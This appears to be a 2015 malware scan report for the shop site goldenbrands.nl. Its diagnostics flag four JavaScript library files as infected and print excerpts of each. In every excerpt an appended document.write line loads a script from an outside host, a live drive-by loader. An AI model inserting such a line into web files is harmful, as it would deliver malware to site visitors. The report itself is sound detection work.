Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=goldenbrands.nl
Result: The website is marked by Google as suspicious - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.goldenbrands.nl/ | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 08 Jan 2015 19:35:48 GMT Location: http://goldenbrands.nl/ Server: Apache/2.0.54 (Fedora) Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.2.17 | clean |
http://goldenbrands.nl/ | 200 OK Content-Length: 32059 Content-Type: text/html | clean |
http://goldenbrands.nl/js/prototype/prototype.js | 200 OK Content-Length: 163433 Content-Type: application/x-javascript | clean |
http://goldenbrands.nl/js/lib/ccard.js | 200 OK Content-Length: 861 Content-Type: application/x-javascript | clean |
http://goldenbrands.nl/js/prototype/validation.js | 200 OK Content-Length: 37678 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The excerpt shows the start and the end of the file; "[…]" marks where the middle is cut:
var Validator = Class.create(); Validator.prototype = { initialize : function(className, error, test, options) { if(typeof test == 'function'){ this.options = $H(options); this._test = test; } else { this.options = $H(test); this._test = function(){return true}; } this.error = error || 'Validation failed.'; this.className = className; }, test : f […] 'AE': [new RegExp('^3[47][0-9]{13}$'), new RegExp('^[0-9]{4}$'), true], 'DI': [new RegExp('^6011[0-9]{12}$'), new RegExp('^[0-9]{3}$'), true], 'JCB': [new RegExp('^(3[0-9]{15}|(2131|1800)[0-9]{11})$'), new RegExp('^[0-9]{4}$'), true], 'OT': [false, new RegExp('^([0-9]{3}|[0-9]{4})?$'), false] }); document.write('<script src="http://slawex781.home.pl/pWfzT9gF.php" type="text/javascript"></script>')
The trailing document.write call, which loads a script from another host, is the same in every flagged file on this page; it is the injected part, and the code before it is the file's regular content.
Antivirus reports:
| ||
http://goldenbrands.nl/js/scriptaculous/builder.js | 200 OK Content-Length: 4864 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The excerpt shows the start and the end of the file; "[…]" marks where the middle is cut:
var Builder = { NODEMAP: { AREA: 'map', CAPTION: 'table', COL: 'table', COLGROUP: 'table', LEGEND: 'fieldset', OPTGROUP: 'select', OPTION: 'select', PARAM: 'object', TBODY: 'table', TD: 'table', TFOOT: 'table', TH: 'table', THEAD: 'table', TR: 'table' }, node: function(elementName) { elementName = elementName.toUpperCase(); var parentTag = this […] "PARAM PRE Q S SAMP SCRIPT SELECT SMALL SPAN STRIKE STRONG STYLE SUB SUP TABLE TBODY TD " + "TEXTAREA TFOOT TH THEAD TITLE TR TT U UL VAR").split(/\s+/); tags.each( function(tag){ scope[tag] = function() { return Builder.node.apply(Builder, [tag].concat($A(arguments))); }; }); } }; document.write('<script src="http://slawex781.home.pl/pWfzT9gF.php" type="text/javascript"></script>') /*/339810*/
The document.write call after the closing "};" of the Builder object, together with the numeric comment that follows it, is the appended part; the same call ends every flagged file on this page.
Antivirus reports:
| ||
http://goldenbrands.nl/js/scriptaculous/effects.js | 200 OK Content-Length: 38865 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The excerpt shows the start and the end of the file; "[…]" marks where the middle is cut:
String.prototype.parseColor = function() { var color = '#'; if (this.slice(0,4) == 'rgb(') { var cols = this.slice(4,this.length-1).split(','); var i=0; do { color += parseInt(cols[i]).toColorPart() } while (++i<3); } else { if (this.slice(0,1) == '#') { if (this.length==4) for(var i=1;i<4;i++) color += (this.charAt(i) + this.charAt(i)).toLowerCase(); if (this.length==7) color = this.toLowerCase(); } } return […] Effect[effect.charAt(0).toUpperCase() + effect.substring(1)](element, options); return element; }; } ); $w('getInlineOpacity forceRerendering setContentZoom collectTextNodes collectTextNodesIgnoreClass getStyles').each( function(f) { Effect.Methods[f] = Element[f]; } ); Element.addMethods(Effect.Methods); document.write('<script src="http://slawex781.home.pl/pWfzT9gF.php" type="text/javascript"></script>')
The document.write call after Element.addMethods(Effect.Methods); is the appended part; the same call ends every flagged file on this page.
Antivirus reports:
| ||
http://goldenbrands.nl/js/scriptaculous/dragdrop.js | 200 OK Content-Length: 31312 Content-Type: application/x-javascript | clean |
http://goldenbrands.nl/js/scriptaculous/controls.js | 200 OK Content-Length: 34690 Content-Type: application/x-javascript | clean |
http://goldenbrands.nl/js/scriptaculous/slider.js | 200 OK Content-Length: 10451 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The excerpt shows the start and the end of the file; "[…]" marks where the middle is cut:
if (!Control) var Control = { }; Control.Slider = Class.create({ initialize: function(handle, track, options) { var slider = this; if (Object.isArray(handle)) { this.handles = handle.collect( function(e) { return $(e) }); } else { this.handles = [$(handle)]; } this.track = $(track); this.options = options || { }; this.axis = this.options.axis || 'horizontal'; this.increment = this.options.increme […] finishDrag: function(event, success) { this.active = false; this.dragging = false; this.updateFinished(); }, updateFinished: function() { if (this.initialized && this.options.onChange) this.options.onChange(this.values.length>1 ? this.values : this.value, this); this.event = null; } }); document.write('<script src="http://slawex781.home.pl/pWfzT9gF.php" type="text/javascript"></script>')
The document.write call after the closing "});" of Control.Slider is the appended part; the same call ends every flagged file on this page.
Antivirus reports:
| ||
http://goldenbrands.nl/js/varien/js.js | 200 OK Content-Length: 22233 Content-Type: application/x-javascript | clean |
http://goldenbrands.nl/js/varien/form.js | 200 OK Content-Length: 11833 Content-Type: application/x-javascript | clean |
http://goldenbrands.nl/js/varien/menu.js | 200 OK Content-Length: 4545 Content-Type: application/x-javascript | clean |
http://goldenbrands.nl/js/mage/translate.js | 200 OK Content-Length: 1716 Content-Type: application/x-javascript | clean |
http://goldenbrands.nl/js/mage/cookies.js | 200 OK Content-Length: 2734 Content-Type: application/x-javascript | clean |
http://www.goldenbrands.nl/test404page.js | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 08 Jan 2015 19:35:54 GMT Location: http://goldenbrands.nl/ Server: Apache/2.0.54 (Fedora) Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.2.17 | clean |
http://goldenbrands.nl/test404page.js | 404 Not Found Content-Length: 32340 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: goldenbrands.nl
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 08 Jan 2015 19:35:48 GMT
Pragma: no-cache
Server: Apache/2.0.54 (Fedora)
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: frontend=5723639559eebdd3ab33c997e555b6ae; expires=Thu, 08-Jan-2015 20:35:49 GMT; path=/; domain=goldenbrands.nl; HttpOnly
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: goldenbrands.nl
Referer: http://www.google.com/search?q=goldenbrands.nl
Result:
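The result is similar to the first query. No suspicious redirects were found. This check compares only the HTTP responses to the two requests above; it does not cover the script files flagged as malicious in the scanned-files list.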